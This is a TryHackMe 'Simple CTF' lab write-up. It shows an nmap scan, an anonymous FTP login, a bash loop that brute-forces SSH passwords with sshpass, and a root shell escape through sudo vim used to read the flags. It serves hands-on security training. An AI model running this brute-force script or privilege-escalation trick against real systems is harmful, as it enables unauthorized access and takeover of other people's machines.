# Simple CTF [EASY] Writeup  - Try Hack Me

Files used in this blog are [here](https://github.com/jd-apprentice/try-hack-me/tree/master/machines/simple_ctf)

## Port scan 🔍

First we start by scanning the ports

```bash
nmap -p- -T4 --min-rate 5000 -vvv -o fullscan 10.10.226.232
```

`-p1-` means all ports
`-T4` is for an aggressive scan
`--min-rate 5000` is used to tell how many packages per second are we sending
`-vvv` is verbose
`-o` is for file output

```
# Nmap 7.80 scan initiated Fri Feb 16 00:10:54 2024 as: nmap -p- -T4 --min-rate 5000 -vvv -o fullscan 10.10.226.232
Nmap scan report for 10.10.226.232 (10.10.226.232)
Host is up, received syn-ack (0.27s latency).
Scanned at 2024-02-16 00:10:54 -03 for 42s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT     STATE SERVICE      REASON
21/tcp   open  ftp          syn-ack
80/tcp   open  http         syn-ack
2222/tcp open  EtherNetIP-1 syn-ack

Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Feb 16 00:11:36 2024 -- 1 IP address (1 host up) scanned in 41.57 seconds
```
## FTP Anonymous login 🤿

Now since there is a port open at 21, we can try to do a anonymous login.

```shell
ftp 10.10.226.232
Connected to 10.10.226.232.
220 (vsFTPd 3.0.3)
Name (10.10.226.232:user): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
```

Now we are inside!
We can verify by running a command like ls

```shell
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
226 Directory send OK.
ftp>
```

If we see something like passive mode, just type `passive` and will enter active mode.

If we dig inside the folder `pub` there is a file called `ForMitch.txt` we are going to download that with `get <file_name>`

And in our local computer we do a `cat <file_name>`

We got the following response                       
```
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
```

## Brute force 👊

So we know that their user is the same for the system and that contains a weak password

Since the message mentions a name we are going to asume that the user is mitch, now we should try to brute force the password.

I'm going to use a package called `sshpass` in order to send the password from a wordlist that I got from internet and create a simple script like this

```bash
#!/bin/bash

for password in $(cat weak_passwords.txt); do
    echo "Trying password: $password"
    sshpass -p$password ssh -p 2222 -o StrictHostKeyChecking=no -o IdentitiesOnly=yes mitch@10.10.226.232
done
```

After a long time trying I got the password!

![img](https://cdn.discordapp.com/attachments/875262629516546089/1207900279333199892/image.png?ex=65e153cc&is=65cedecc&hm=f10e079c83ce76d0ef103f93239475bac703dfa0bb84abfb9b4890f60a8db799&)

## Obtain the flags 🏁

If we do a `ls` we can see that the `user.txt` flag is there, take it and continue!

One of the first things you always do in a system (even before trying things like linpeas) is to do a simple `sudo -l` to see if there is something that can be run with sudo.

```shell
$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
```
And of course there he's, we can use `sudo vim`

Lets do a `sudo vim` then type `:` and after `! ls /root` and press enter, with this we are going to see if the root flag is there.

![img](https://cdn.discordapp.com/attachments/875262629516546089/1207904023848681492/image.png?ex=65e15749&is=65cee249&hm=cc9c11435367658b1909cbcd34d61c2c217c1466165f4555d13152167076fcf5&)

```shell
$ sudo vim

root.txt
```
And there it is! just like before but this time with `! cat /root/root.txt`

![img](https://cdn.discordapp.com/attachments/875262629516546089/1207904509829971980/image.png?ex=65e157bc&is=65cee2bc&hm=353a242df153233f154100e3f5760595cf9629bf4fa718cb2d44ea7f6501b1c3&)

Congratulations you got your flag!
